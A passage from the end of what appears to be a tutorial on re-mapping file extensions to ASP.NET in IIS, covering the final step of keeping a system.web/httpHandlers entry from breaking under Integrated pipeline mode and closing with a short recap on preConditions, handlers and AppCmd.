      4. Finally, since we are adding a system.web/httpHandlers entry, and to make sure this will not break when someone changes the application pool to Integrated mode, we tell IIS not to "complain" if we get run in Integrated mode, since we also included the handler in the IIS sections in the right way.

    Hopefully this helps you understand a bit how to re-map extensions to ASP.NET, and in doing so learn a bit more about preConditions, handlers and AppCmd.
